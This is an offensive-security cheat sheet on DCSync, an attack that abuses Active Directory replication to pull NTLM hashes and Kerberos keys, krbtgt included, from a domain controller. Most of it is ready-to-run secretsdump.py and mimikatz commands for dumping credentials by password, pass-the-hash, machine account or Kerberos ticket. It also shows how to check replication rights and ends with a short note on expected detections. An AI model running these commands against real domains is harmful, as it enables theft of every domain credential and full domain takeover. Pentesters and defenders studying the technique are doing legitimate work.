DCSync¶

Abuse AD replication (DRSUAPI GetNCChanges) to request password data (NTLM) and Kerberos keys (incl. KRBTGT) without touching ntds.dit.

Required permissions (on the Domain Naming Context)¶

Replicating Directory Changes (DS-Replication-Get-Changes)
Replicating Directory Changes All (DS-Replication-Get-Changes-All)
Replicating Directory Changes In Filtered Set (DS-Replication-Get-Changes-In-Filtered-Set)

Lacking In Filtered Set may omit some confidential attributes during replication.

Action	Command
DCSync all users	`secretsdump.py -just-dc <domain>/<user>:'<pass>'@<dc_fqdn>`
DCSync single user (e.g., krbtgt)	`secretsdump.py -just-dc-user krbtgt <domain>/<user>:'<pass>'@<dc_fqdn>`
Use NT hash (pass-the-hash)	`secretsdump.py -just-dc -hashes :<NTHASH> <domain>/<user>@<dc_fqdn>`
Use machine account (e.g., DC$)	`secretsdump.py -just-dc -hashes :<DC_MACHINE_NT> <domain>/<DC_HOSTNAME>$@<dc_fqdn>`
Use Kerberos TGT (ccache)	`KRB5CCNAME=<user>.ccache secretsdump.py -just-dc -k -no-pass <domain>/<user>@<dc_fqdn>`

Action	Command
DCSync krbtgt	`mimikatz # lsadump::dcsync /domain:<domain> /user:krbtgt`
DCSync a user	`mimikatz # lsadump::dcsync /domain:<domain> /user:<samAccountName>`
DCSync with explicit DC	`mimikatz # lsadump::dcsync /domain:<domain> /dc:<dc_fqdn> /user:<samAccountName>`

Action	Command
Check replication rights on the domain NC	`dsacls "DC=<domain>,DC=<tld>" \| findstr /I "Replicating Directory Changes"`
BloodHound	Look for GetChanges, GetChangesAll, GetChangesInFilteredSet granted to your principal.

Run against a DC (<dc_fqdn>). Non-DCs won’t answer DRSUAPI requests.
DCSync is RPC-based, not LDAP; LDAPS settings don’t apply.
Expect detections: 4662 events with replication GUIDs; unusual DRSUAPI from non-DC hosts.